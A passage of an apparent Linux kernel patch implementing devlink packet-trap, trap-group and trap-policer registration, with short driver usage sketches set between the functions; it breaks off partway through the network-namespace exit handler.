++	DEVLINK_TRAP(IGMP_V3_REPORT, CONTROL),
++	DEVLINK_TRAP(IGMP_V2_LEAVE, CONTROL),
++	DEVLINK_TRAP(MLD_QUERY, CONTROL),
++	DEVLINK_TRAP(MLD_V1_REPORT, CONTROL),
++	DEVLINK_TRAP(MLD_V2_REPORT, CONTROL),
++	DEVLINK_TRAP(MLD_V1_DONE, CONTROL),
++	DEVLINK_TRAP(IPV4_DHCP, CONTROL),
++	DEVLINK_TRAP(IPV6_DHCP, CONTROL),
++	DEVLINK_TRAP(ARP_REQUEST, CONTROL),
++	DEVLINK_TRAP(ARP_RESPONSE, CONTROL),
++	DEVLINK_TRAP(ARP_OVERLAY, CONTROL),
++	DEVLINK_TRAP(IPV6_NEIGH_SOLICIT, CONTROL),
++	DEVLINK_TRAP(IPV6_NEIGH_ADVERT, CONTROL),
++	DEVLINK_TRAP(IPV4_BFD, CONTROL),
++	DEVLINK_TRAP(IPV6_BFD, CONTROL),
++	DEVLINK_TRAP(IPV4_OSPF, CONTROL),
++	DEVLINK_TRAP(IPV6_OSPF, CONTROL),
++	DEVLINK_TRAP(IPV4_BGP, CONTROL),
++	DEVLINK_TRAP(IPV6_BGP, CONTROL),
++	DEVLINK_TRAP(IPV4_VRRP, CONTROL),
++	DEVLINK_TRAP(IPV6_VRRP, CONTROL),
++	DEVLINK_TRAP(IPV4_PIM, CONTROL),
++	DEVLINK_TRAP(IPV6_PIM, CONTROL),
++	DEVLINK_TRAP(UC_LB, CONTROL),
++	DEVLINK_TRAP(LOCAL_ROUTE, CONTROL),
++	DEVLINK_TRAP(EXTERNAL_ROUTE, CONTROL),
++	DEVLINK_TRAP(IPV6_UC_DIP_LINK_LOCAL_SCOPE, CONTROL),
++	DEVLINK_TRAP(IPV6_DIP_ALL_NODES, CONTROL),
++	DEVLINK_TRAP(IPV6_DIP_ALL_ROUTERS, CONTROL),
++	DEVLINK_TRAP(IPV6_ROUTER_SOLICIT, CONTROL),
++	DEVLINK_TRAP(IPV6_ROUTER_ADVERT, CONTROL),
++	DEVLINK_TRAP(IPV6_REDIRECT, CONTROL),
++	DEVLINK_TRAP(IPV4_ROUTER_ALERT, CONTROL),
++	DEVLINK_TRAP(IPV6_ROUTER_ALERT, CONTROL),
++	DEVLINK_TRAP(PTP_EVENT, CONTROL),
++	DEVLINK_TRAP(PTP_GENERAL, CONTROL),
++	DEVLINK_TRAP(FLOW_ACTION_SAMPLE, CONTROL),
++	DEVLINK_TRAP(FLOW_ACTION_TRAP, CONTROL),
++	DEVLINK_TRAP(EARLY_DROP, DROP),
++	DEVLINK_TRAP(VXLAN_PARSING, DROP),
++	DEVLINK_TRAP(LLC_SNAP_PARSING, DROP),
++	DEVLINK_TRAP(VLAN_PARSING, DROP),
++	DEVLINK_TRAP(PPPOE_PPP_PARSING, DROP),
++	DEVLINK_TRAP(MPLS_PARSING, DROP),
++	DEVLINK_TRAP(ARP_PARSING, DROP),
++	DEVLINK_TRAP(IP_1_PARSING, DROP),
++	DEVLINK_TRAP(IP_N_PARSING, DROP),
++	DEVLINK_TRAP(GRE_PARSING, DROP),
++	DEVLINK_TRAP(UDP_PARSING, DROP),
++	DEVLINK_TRAP(TCP_PARSING, DROP),
++	DEVLINK_TRAP(IPSEC_PARSING, DROP),
++	DEVLINK_TRAP(SCTP_PARSING, DROP),
++	DEVLINK_TRAP(DCCP_PARSING, DROP),
++	DEVLINK_TRAP(GTP_PARSING, DROP),
++	DEVLINK_TRAP(ESP_PARSING, DROP),
++	DEVLINK_TRAP(BLACKHOLE_NEXTHOP, DROP),
++	DEVLINK_TRAP(DMAC_FILTER, DROP),
++};
++
++#define DEVLINK_TRAP_GROUP(_id)						      \
++	{								      \
++		.id = DEVLINK_TRAP_GROUP_GENERIC_ID_##_id,		      \
++		.name = DEVLINK_TRAP_GROUP_GENERIC_NAME_##_id,		      \
++	}
++
++static const struct devlink_trap_group devlink_trap_group_generic[] = {
++	DEVLINK_TRAP_GROUP(L2_DROPS),
++	DEVLINK_TRAP_GROUP(L3_DROPS),
++	DEVLINK_TRAP_GROUP(L3_EXCEPTIONS),
++	DEVLINK_TRAP_GROUP(BUFFER_DROPS),
++	DEVLINK_TRAP_GROUP(TUNNEL_DROPS),
++	DEVLINK_TRAP_GROUP(ACL_DROPS),
++	DEVLINK_TRAP_GROUP(STP),
++	DEVLINK_TRAP_GROUP(LACP),
++	DEVLINK_TRAP_GROUP(LLDP),
++	DEVLINK_TRAP_GROUP(MC_SNOOPING),
++	DEVLINK_TRAP_GROUP(DHCP),
++	DEVLINK_TRAP_GROUP(NEIGH_DISCOVERY),
++	DEVLINK_TRAP_GROUP(BFD),
++	DEVLINK_TRAP_GROUP(OSPF),
++	DEVLINK_TRAP_GROUP(BGP),
++	DEVLINK_TRAP_GROUP(VRRP),
++	DEVLINK_TRAP_GROUP(PIM),
++	DEVLINK_TRAP_GROUP(UC_LB),
++	DEVLINK_TRAP_GROUP(LOCAL_DELIVERY),
++	DEVLINK_TRAP_GROUP(EXTERNAL_DELIVERY),
++	DEVLINK_TRAP_GROUP(IPV6),
++	DEVLINK_TRAP_GROUP(PTP_EVENT),
++	DEVLINK_TRAP_GROUP(PTP_GENERAL),
++	DEVLINK_TRAP_GROUP(ACL_SAMPLE),
++	DEVLINK_TRAP_GROUP(ACL_TRAP),
++	DEVLINK_TRAP_GROUP(PARSER_ERROR_DROPS),
++};
++
++static int devlink_trap_generic_verify(const struct devlink_trap *trap)
++{
++	if (trap->id > DEVLINK_TRAP_GENERIC_ID_MAX)
++		return -EINVAL;
++
++	if (strcmp(trap->name, devlink_trap_generic[trap->id].name))
++		return -EINVAL;
++
++	if (trap->type != devlink_trap_generic[trap->id].type)
++		return -EINVAL;
++
++	return 0;
++}
++
++static int devlink_trap_driver_verify(const struct devlink_trap *trap)
++{
++	int i;
++
++	if (trap->id <= DEVLINK_TRAP_GENERIC_ID_MAX)
++		return -EINVAL;
++
++	for (i = 0; i < ARRAY_SIZE(devlink_trap_generic); i++) {
++		if (!strcmp(trap->name, devlink_trap_generic[i].name))
++			return -EEXIST;
++	}
++
++	return 0;
++}
++
++static int devlink_trap_verify(const struct devlink_trap *trap)
++{
++	if (!trap || !trap->name)
++		return -EINVAL;
++
++	if (trap->generic)
++		return devlink_trap_generic_verify(trap);
++	else
++		return devlink_trap_driver_verify(trap);
++}
++
++static int
++devlink_trap_group_generic_verify(const struct devlink_trap_group *group)
++{
++	if (group->id > DEVLINK_TRAP_GROUP_GENERIC_ID_MAX)
++		return -EINVAL;
++
++	if (strcmp(group->name, devlink_trap_group_generic[group->id].name))
++		return -EINVAL;
++
++	return 0;
++}
++
++static int
++devlink_trap_group_driver_verify(const struct devlink_trap_group *group)
++{
++	int i;
++
++	if (group->id <= DEVLINK_TRAP_GROUP_GENERIC_ID_MAX)
++		return -EINVAL;
++
++	for (i = 0; i < ARRAY_SIZE(devlink_trap_group_generic); i++) {
++		if (!strcmp(group->name, devlink_trap_group_generic[i].name))
++			return -EEXIST;
++	}
++
++	return 0;
++}
++
++static int devlink_trap_group_verify(const struct devlink_trap_group *group)
++{
++	if (group->generic)
++		return devlink_trap_group_generic_verify(group);
++	else
++		return devlink_trap_group_driver_verify(group);
++}
++
++static void
++devlink_trap_group_notify(struct devlink *devlink,
++			  const struct devlink_trap_group_item *group_item,
++			  enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_GROUP_NEW &&
++		     cmd != DEVLINK_CMD_TRAP_GROUP_DEL);
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_trap_group_fill(msg, devlink, group_item, cmd, 0, 0,
++					 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int
++devlink_trap_item_group_link(struct devlink *devlink,
++			     struct devlink_trap_item *trap_item)
++{
++	u16 group_id = trap_item->trap->init_group_id;
++	struct devlink_trap_group_item *group_item;
++
++	group_item = devlink_trap_group_item_lookup_by_id(devlink, group_id);
++	if (WARN_ON_ONCE(!group_item))
++		return -EINVAL;
++
++	trap_item->group_item = group_item;
++
++	return 0;
++}
++
++static void devlink_trap_notify(struct devlink *devlink,
++				const struct devlink_trap_item *trap_item,
++				enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_NEW &&
++		     cmd != DEVLINK_CMD_TRAP_DEL);
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_trap_fill(msg, devlink, trap_item, cmd, 0, 0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int
++devlink_trap_register(struct devlink *devlink,
++		      const struct devlink_trap *trap, void *priv)
++{
++	struct devlink_trap_item *trap_item;
++	int err;
++
++	if (devlink_trap_item_lookup(devlink, trap->name))
++		return -EEXIST;
++
++	trap_item = kzalloc(sizeof(*trap_item), GFP_KERNEL);
++	if (!trap_item)
++		return -ENOMEM;
++
++	trap_item->stats = netdev_alloc_pcpu_stats(struct devlink_stats);
++	if (!trap_item->stats) {
++		err = -ENOMEM;
++		goto err_stats_alloc;
++	}
++
++	trap_item->trap = trap;
++	trap_item->action = trap->init_action;
++	trap_item->priv = priv;
++
++	err = devlink_trap_item_group_link(devlink, trap_item);
++	if (err)
++		goto err_group_link;
++
++	err = devlink->ops->trap_init(devlink, trap, trap_item);
++	if (err)
++		goto err_trap_init;
++
++	list_add_tail(&trap_item->list, &devlink->trap_list);
++	devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_NEW);
++
++	return 0;
++
++err_trap_init:
++err_group_link:
++	free_percpu(trap_item->stats);
++err_stats_alloc:
++	kfree(trap_item);
++	return err;
++}
++
++static void devlink_trap_unregister(struct devlink *devlink,
++				    const struct devlink_trap *trap)
++{
++	struct devlink_trap_item *trap_item;
++
++	trap_item = devlink_trap_item_lookup(devlink, trap->name);
++	if (WARN_ON_ONCE(!trap_item))
++		return;
++
++	devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_DEL);
++	list_del(&trap_item->list);
++	if (devlink->ops->trap_fini)
++		devlink->ops->trap_fini(devlink, trap, trap_item);
++	free_percpu(trap_item->stats);
++	kfree(trap_item);
++}
++
++static void devlink_trap_disable(struct devlink *devlink,
++				 const struct devlink_trap *trap)
++{
++	struct devlink_trap_item *trap_item;
++
++	trap_item = devlink_trap_item_lookup(devlink, trap->name);
++	if (WARN_ON_ONCE(!trap_item))
++		return;
++
++	devlink->ops->trap_action_set(devlink, trap, DEVLINK_TRAP_ACTION_DROP,
++				      NULL);
++	trap_item->action = DEVLINK_TRAP_ACTION_DROP;
++}
++
++/**
++ * devl_traps_register - Register packet traps with devlink.
++ * @devlink: devlink.
++ * @traps: Packet traps.
++ * @traps_count: Count of provided packet traps.
++ * @priv: Driver private information.
++ *
++ * Return: Non-zero value on failure.
++ */
++int devl_traps_register(struct devlink *devlink,
++			const struct devlink_trap *traps,
++			size_t traps_count, void *priv)
++{
++	int i, err;
++
++	if (!devlink->ops->trap_init || !devlink->ops->trap_action_set)
++		return -EINVAL;
++
++	devl_assert_locked(devlink);
++	for (i = 0; i < traps_count; i++) {
++		const struct devlink_trap *trap = &traps[i];
++
++		err = devlink_trap_verify(trap);
++		if (err)
++			goto err_trap_verify;
++
++		err = devlink_trap_register(devlink, trap, priv);
++		if (err)
++			goto err_trap_register;
++	}
++
++	return 0;
++
++err_trap_register:
++err_trap_verify:
++	for (i--; i >= 0; i--)
++		devlink_trap_unregister(devlink, &traps[i]);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devl_traps_register);
++
++/**
++ * devlink_traps_register - Register packet traps with devlink.
++ * @devlink: devlink.
++ * @traps: Packet traps.
++ * @traps_count: Count of provided packet traps.
++ * @priv: Driver private information.
++ *
++ * Context: Takes and releases devlink->lock <mutex>.
++ *
++ * Return: Non-zero value on failure.
++ */
++int devlink_traps_register(struct devlink *devlink,
++			   const struct devlink_trap *traps,
++			   size_t traps_count, void *priv)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_traps_register(devlink, traps, traps_count, priv);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_traps_register);
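A sketch of a trap array built from the generic-trap helper macro; the group referenced must already be registered, and the metadata capability (0 here) is hypothetical:

	static const struct devlink_trap my_traps[] = {
		DEVLINK_TRAP_GENERIC(DROP, DROP, INGRESS_VLAN_FILTER,
				     DEVLINK_TRAP_GROUP_GENERIC_ID_L2_DROPS, 0),
	};

	err = devlink_traps_register(devlink, my_traps,
				     ARRAY_SIZE(my_traps), priv);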
++
++/**
++ * devl_traps_unregister - Unregister packet traps from devlink.
++ * @devlink: devlink.
++ * @traps: Packet traps.
++ * @traps_count: Count of provided packet traps.
++ */
++void devl_traps_unregister(struct devlink *devlink,
++			   const struct devlink_trap *traps,
++			   size_t traps_count)
++{
++	int i;
++
++	devl_assert_locked(devlink);
++	/* Make sure we do not have any packets in-flight while unregistering
++	 * traps by disabling all of them and waiting for a grace period.
++	 */
++	for (i = traps_count - 1; i >= 0; i--)
++		devlink_trap_disable(devlink, &traps[i]);
++	synchronize_rcu();
++	for (i = traps_count - 1; i >= 0; i--)
++		devlink_trap_unregister(devlink, &traps[i]);
++}
++EXPORT_SYMBOL_GPL(devl_traps_unregister);
++
++/**
++ * devlink_traps_unregister - Unregister packet traps from devlink.
++ * @devlink: devlink.
++ * @traps: Packet traps.
++ * @traps_count: Count of provided packet traps.
++ *
++ * Context: Takes and releases devlink->lock <mutex>.
++ */
++void devlink_traps_unregister(struct devlink *devlink,
++			      const struct devlink_trap *traps,
++			      size_t traps_count)
++{
++	devl_lock(devlink);
++	devl_traps_unregister(devlink, traps, traps_count);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_traps_unregister);
++
++static void
++devlink_trap_stats_update(struct devlink_stats __percpu *trap_stats,
++			  size_t skb_len)
++{
++	struct devlink_stats *stats;
++
++	stats = this_cpu_ptr(trap_stats);
++	u64_stats_update_begin(&stats->syncp);
++	u64_stats_add(&stats->rx_bytes, skb_len);
++	u64_stats_inc(&stats->rx_packets);
++	u64_stats_update_end(&stats->syncp);
++}
++
++static void
++devlink_trap_report_metadata_set(struct devlink_trap_metadata *metadata,
++				 const struct devlink_trap_item *trap_item,
++				 struct devlink_port *in_devlink_port,
++				 const struct flow_action_cookie *fa_cookie)
++{
++	metadata->trap_name = trap_item->trap->name;
++	metadata->trap_group_name = trap_item->group_item->group->name;
++	metadata->fa_cookie = fa_cookie;
++	metadata->trap_type = trap_item->trap->type;
++
++	spin_lock(&in_devlink_port->type_lock);
++	if (in_devlink_port->type == DEVLINK_PORT_TYPE_ETH)
++		metadata->input_dev = in_devlink_port->type_dev;
++	spin_unlock(&in_devlink_port->type_lock);
++}
++
++/**
++ * devlink_trap_report - Report trapped packet to drop monitor.
++ * @devlink: devlink.
++ * @skb: Trapped packet.
++ * @trap_ctx: Trap context.
++ * @in_devlink_port: Input devlink port.
++ * @fa_cookie: Flow action cookie. Could be NULL.
++ */
++void devlink_trap_report(struct devlink *devlink, struct sk_buff *skb,
++			 void *trap_ctx, struct devlink_port *in_devlink_port,
++			 const struct flow_action_cookie *fa_cookie)
++{
++	struct devlink_trap_item *trap_item = trap_ctx;
++
++	devlink_trap_stats_update(trap_item->stats, skb->len);
++	devlink_trap_stats_update(trap_item->group_item->stats, skb->len);
++
++	if (trace_devlink_trap_report_enabled()) {
++		struct devlink_trap_metadata metadata = {};
++
++		devlink_trap_report_metadata_set(&metadata, trap_item,
++						 in_devlink_port, fa_cookie);
++		trace_devlink_trap_report(devlink, skb, &metadata);
++	}
++}
++EXPORT_SYMBOL_GPL(devlink_trap_report);
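A hypothetical RX-path consumer (struct my_port is assumed); trap_ctx is the pointer devlink handed to the driver's trap_init() op:

	static void my_rx_trap(struct my_port *port, struct sk_buff *skb,
			       void *trap_ctx)
	{
		/* Updates trap/group stats and, when tracing is enabled,
		 * reports packet metadata to drop monitor.
		 */
		devlink_trap_report(port->devlink, skb, trap_ctx,
				    port->devlink_port, NULL /* fa_cookie */);
		consume_skb(skb);
	}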
++
++/**
++ * devlink_trap_ctx_priv - Trap context to driver private information.
++ * @trap_ctx: Trap context.
++ *
++ * Return: Driver private information passed during registration.
++ */
++void *devlink_trap_ctx_priv(void *trap_ctx)
++{
++	struct devlink_trap_item *trap_item = trap_ctx;
++
++	return trap_item->priv;
++}
++EXPORT_SYMBOL_GPL(devlink_trap_ctx_priv);
++
++static int
++devlink_trap_group_item_policer_link(struct devlink *devlink,
++				     struct devlink_trap_group_item *group_item)
++{
++	u32 policer_id = group_item->group->init_policer_id;
++	struct devlink_trap_policer_item *policer_item;
++
++	if (policer_id == 0)
++		return 0;
++
++	policer_item = devlink_trap_policer_item_lookup(devlink, policer_id);
++	if (WARN_ON_ONCE(!policer_item))
++		return -EINVAL;
++
++	group_item->policer_item = policer_item;
++
++	return 0;
++}
++
++static int
++devlink_trap_group_register(struct devlink *devlink,
++			    const struct devlink_trap_group *group)
++{
++	struct devlink_trap_group_item *group_item;
++	int err;
++
++	if (devlink_trap_group_item_lookup(devlink, group->name))
++		return -EEXIST;
++
++	group_item = kzalloc(sizeof(*group_item), GFP_KERNEL);
++	if (!group_item)
++		return -ENOMEM;
++
++	group_item->stats = netdev_alloc_pcpu_stats(struct devlink_stats);
++	if (!group_item->stats) {
++		err = -ENOMEM;
++		goto err_stats_alloc;
++	}
++
++	group_item->group = group;
++
++	err = devlink_trap_group_item_policer_link(devlink, group_item);
++	if (err)
++		goto err_policer_link;
++
++	if (devlink->ops->trap_group_init) {
++		err = devlink->ops->trap_group_init(devlink, group);
++		if (err)
++			goto err_group_init;
++	}
++
++	list_add_tail(&group_item->list, &devlink->trap_group_list);
++	devlink_trap_group_notify(devlink, group_item,
++				  DEVLINK_CMD_TRAP_GROUP_NEW);
++
++	return 0;
++
++err_group_init:
++err_policer_link:
++	free_percpu(group_item->stats);
++err_stats_alloc:
++	kfree(group_item);
++	return err;
++}
++
++static void
++devlink_trap_group_unregister(struct devlink *devlink,
++			      const struct devlink_trap_group *group)
++{
++	struct devlink_trap_group_item *group_item;
++
++	group_item = devlink_trap_group_item_lookup(devlink, group->name);
++	if (WARN_ON_ONCE(!group_item))
++		return;
++
++	devlink_trap_group_notify(devlink, group_item,
++				  DEVLINK_CMD_TRAP_GROUP_DEL);
++	list_del(&group_item->list);
++	free_percpu(group_item->stats);
++	kfree(group_item);
++}
++
++/**
++ * devl_trap_groups_register - Register packet trap groups with devlink.
++ * @devlink: devlink.
++ * @groups: Packet trap groups.
++ * @groups_count: Count of provided packet trap groups.
++ *
++ * Return: Non-zero value on failure.
++ */
++int devl_trap_groups_register(struct devlink *devlink,
++			      const struct devlink_trap_group *groups,
++			      size_t groups_count)
++{
++	int i, err;
++
++	devl_assert_locked(devlink);
++	for (i = 0; i < groups_count; i++) {
++		const struct devlink_trap_group *group = &groups[i];
++
++		err = devlink_trap_group_verify(group);
++		if (err)
++			goto err_trap_group_verify;
++
++		err = devlink_trap_group_register(devlink, group);
++		if (err)
++			goto err_trap_group_register;
++	}
++
++	return 0;
++
++err_trap_group_register:
++err_trap_group_verify:
++	for (i--; i >= 0; i--)
++		devlink_trap_group_unregister(devlink, &groups[i]);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devl_trap_groups_register);
++
++/**
++ * devlink_trap_groups_register - Register packet trap groups with devlink.
++ * @devlink: devlink.
++ * @groups: Packet trap groups.
++ * @groups_count: Count of provided packet trap groups.
++ *
++ * Context: Takes and releases devlink->lock <mutex>.
++ *
++ * Return: Non-zero value on failure.
++ */
++int devlink_trap_groups_register(struct devlink *devlink,
++				 const struct devlink_trap_group *groups,
++				 size_t groups_count)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_trap_groups_register(devlink, groups, groups_count);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_trap_groups_register);
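A group array using the generic-group helper macro; policer ID 0 means no policer is bound, per devlink_trap_group_item_policer_link() above:

	static const struct devlink_trap_group my_groups[] = {
		DEVLINK_TRAP_GROUP_GENERIC(L2_DROPS, 0 /* no policer */),
	};

	err = devlink_trap_groups_register(devlink, my_groups,
					   ARRAY_SIZE(my_groups));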
++
++/**
++ * devl_trap_groups_unregister - Unregister packet trap groups from devlink.
++ * @devlink: devlink.
++ * @groups: Packet trap groups.
++ * @groups_count: Count of provided packet trap groups.
++ */
++void devl_trap_groups_unregister(struct devlink *devlink,
++				 const struct devlink_trap_group *groups,
++				 size_t groups_count)
++{
++	int i;
++
++	devl_assert_locked(devlink);
++	for (i = groups_count - 1; i >= 0; i--)
++		devlink_trap_group_unregister(devlink, &groups[i]);
++}
++EXPORT_SYMBOL_GPL(devl_trap_groups_unregister);
++
++/**
++ * devlink_trap_groups_unregister - Unregister packet trap groups from devlink.
++ * @devlink: devlink.
++ * @groups: Packet trap groups.
++ * @groups_count: Count of provided packet trap groups.
++ *
++ * Context: Takes and releases devlink->lock <mutex>.
++ */
++void devlink_trap_groups_unregister(struct devlink *devlink,
++				    const struct devlink_trap_group *groups,
++				    size_t groups_count)
++{
++	devl_lock(devlink);
++	devl_trap_groups_unregister(devlink, groups, groups_count);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_trap_groups_unregister);
++
++static void
++devlink_trap_policer_notify(struct devlink *devlink,
++			    const struct devlink_trap_policer_item *policer_item,
++			    enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_POLICER_NEW &&
++		     cmd != DEVLINK_CMD_TRAP_POLICER_DEL);
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_trap_policer_fill(msg, devlink, policer_item, cmd, 0,
++					   0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int
++devlink_trap_policer_register(struct devlink *devlink,
++			      const struct devlink_trap_policer *policer)
++{
++	struct devlink_trap_policer_item *policer_item;
++	int err;
++
++	if (devlink_trap_policer_item_lookup(devlink, policer->id))
++		return -EEXIST;
++
++	policer_item = kzalloc(sizeof(*policer_item), GFP_KERNEL);
++	if (!policer_item)
++		return -ENOMEM;
++
++	policer_item->policer = policer;
++	policer_item->rate = policer->init_rate;
++	policer_item->burst = policer->init_burst;
++
++	if (devlink->ops->trap_policer_init) {
++		err = devlink->ops->trap_policer_init(devlink, policer);
++		if (err)
++			goto err_policer_init;
++	}
++
++	list_add_tail(&policer_item->list, &devlink->trap_policer_list);
++	devlink_trap_policer_notify(devlink, policer_item,
++				    DEVLINK_CMD_TRAP_POLICER_NEW);
++
++	return 0;
++
++err_policer_init:
++	kfree(policer_item);
++	return err;
++}
++
++static void
++devlink_trap_policer_unregister(struct devlink *devlink,
++				const struct devlink_trap_policer *policer)
++{
++	struct devlink_trap_policer_item *policer_item;
++
++	policer_item = devlink_trap_policer_item_lookup(devlink, policer->id);
++	if (WARN_ON_ONCE(!policer_item))
++		return;
++
++	devlink_trap_policer_notify(devlink, policer_item,
++				    DEVLINK_CMD_TRAP_POLICER_DEL);
++	list_del(&policer_item->list);
++	if (devlink->ops->trap_policer_fini)
++		devlink->ops->trap_policer_fini(devlink, policer);
++	kfree(policer_item);
++}
++
++/**
++ * devl_trap_policers_register - Register packet trap policers with devlink.
++ * @devlink: devlink.
++ * @policers: Packet trap policers.
++ * @policers_count: Count of provided packet trap policers.
++ *
++ * Return: Non-zero value on failure.
++ */
++int
++devl_trap_policers_register(struct devlink *devlink,
++			    const struct devlink_trap_policer *policers,
++			    size_t policers_count)
++{
++	int i, err;
++
++	devl_assert_locked(devlink);
++	for (i = 0; i < policers_count; i++) {
++		const struct devlink_trap_policer *policer = &policers[i];
++
++		if (WARN_ON(policer->id == 0 ||
++			    policer->max_rate < policer->min_rate ||
++			    policer->max_burst < policer->min_burst)) {
++			err = -EINVAL;
++			goto err_trap_policer_verify;
++		}
++
++		err = devlink_trap_policer_register(devlink, policer);
++		if (err)
++			goto err_trap_policer_register;
++	}
++	return 0;
++
++err_trap_policer_register:
++err_trap_policer_verify:
++	for (i--; i >= 0; i--)
++		devlink_trap_policer_unregister(devlink, &policers[i]);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devl_trap_policers_register);
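A policer array sketch using the helper macro; the limits are hypothetical, and id 0 would trip the WARN_ON above. The devl_ variant expects devlink->lock to be held:

	static const struct devlink_trap_policer my_policers[] = {
		DEVLINK_TRAP_POLICER(1, 1000, 128,	/* id, rate, burst */
				     10000, 1,		/* max_rate, min_rate */
				     1024, 1),		/* max_burst, min_burst */
	};

	err = devl_trap_policers_register(devlink, my_policers,
					  ARRAY_SIZE(my_policers));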
++
++/**
++ * devl_trap_policers_unregister - Unregister packet trap policers from devlink.
++ * @devlink: devlink.
++ * @policers: Packet trap policers.
++ * @policers_count: Count of provided packet trap policers.
++ */
++void
++devl_trap_policers_unregister(struct devlink *devlink,
++			      const struct devlink_trap_policer *policers,
++			      size_t policers_count)
++{
++	int i;
++
++	devl_assert_locked(devlink);
++	for (i = policers_count - 1; i >= 0; i--)
++		devlink_trap_policer_unregister(devlink, &policers[i]);
++}
++EXPORT_SYMBOL_GPL(devl_trap_policers_unregister);
++
++static void __devlink_compat_running_version(struct devlink *devlink,
++					     char *buf, size_t len)
++{
++	struct devlink_info_req req = {};
++	const struct nlattr *nlattr;
++	struct sk_buff *msg;
++	int rem, err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	req.msg = msg;
++	err = devlink->ops->info_get(devlink, &req, NULL);
++	if (err)
++		goto free_msg;
++
++	nla_for_each_attr(nlattr, (void *)msg->data, msg->len, rem) {
++		const struct nlattr *kv;
++		int rem_kv;
++
++		if (nla_type(nlattr) != DEVLINK_ATTR_INFO_VERSION_RUNNING)
++			continue;
++
++		nla_for_each_nested(kv, nlattr, rem_kv) {
++			if (nla_type(kv) != DEVLINK_ATTR_INFO_VERSION_VALUE)
++				continue;
++
++			strlcat(buf, nla_data(kv), len);
++			strlcat(buf, " ", len);
++		}
++	}
++free_msg:
++	nlmsg_free(msg);
++}
++
++static struct devlink_port *netdev_to_devlink_port(struct net_device *dev)
++{
++	if (!dev->netdev_ops->ndo_get_devlink_port)
++		return NULL;
++
++	return dev->netdev_ops->ndo_get_devlink_port(dev);
++}
++
++void devlink_compat_running_version(struct devlink *devlink,
++				    char *buf, size_t len)
++{
++	if (!devlink->ops->info_get)
++		return;
++
++	devl_lock(devlink);
++	__devlink_compat_running_version(devlink, buf, len);
++	devl_unlock(devlink);
++}
++
++int devlink_compat_flash_update(struct devlink *devlink, const char *file_name)
++{
++	struct devlink_flash_update_params params = {};
++	int ret;
++
++	if (!devlink->ops->flash_update)
++		return -EOPNOTSUPP;
++
++	ret = request_firmware(&params.fw, file_name, devlink->dev);
++	if (ret)
++		return ret;
++
++	devl_lock(devlink);
++	devlink_flash_update_begin_notify(devlink);
++	ret = devlink->ops->flash_update(devlink, &params, NULL);
++	devlink_flash_update_end_notify(devlink);
++	devl_unlock(devlink);
++
++	release_firmware(params.fw);
++
++	return ret;
++}
++
++int devlink_compat_phys_port_name_get(struct net_device *dev,
++				      char *name, size_t len)
++{
++	struct devlink_port *devlink_port;
++
++	/* RTNL mutex is held here which ensures that devlink_port
++	 * instance cannot disappear in the middle. No need to take
++	 * any devlink lock as only permanent values are accessed.
++	 */
++	ASSERT_RTNL();
++
++	devlink_port = netdev_to_devlink_port(dev);
++	if (!devlink_port)
++		return -EOPNOTSUPP;
++
++	return __devlink_port_phys_port_name_get(devlink_port, name, len);
++}
++
++int devlink_compat_switch_id_get(struct net_device *dev,
++				 struct netdev_phys_item_id *ppid)
++{
++	struct devlink_port *devlink_port;
++
++	/* Caller must hold RTNL mutex or reference to dev, which ensures that
++	 * devlink_port instance cannot disappear in the middle. No need to take
++	 * any devlink lock as only permanent values are accessed.
++	 */
++	devlink_port = netdev_to_devlink_port(dev);
++	if (!devlink_port || !devlink_port->switch_port)
++		return -EOPNOTSUPP;
++
++	memcpy(ppid, &devlink_port->attrs.switch_id, sizeof(*ppid));
++
++	return 0;
++}
++
++static void __net_exit devlink_pernet_pre_exit(struct net *net)
++{
++	struct devlink *devlink;
++	u32 actions_performed;
++	unsigned long index;
++	int err;
++
++	/* In case network namespace is getting destroyed, reload
++	 * all devlink instances from this namespace into init_net.
++	 */
++	devlinks_xa_for_each_registered_get(net, index, devlink) {
++		WARN_ON(!(devlink->features & DEVLINK_F_RELOAD));
++		mutex_lock(&devlink->lock);
++		err = devlink_reload(devlink, &init_net,
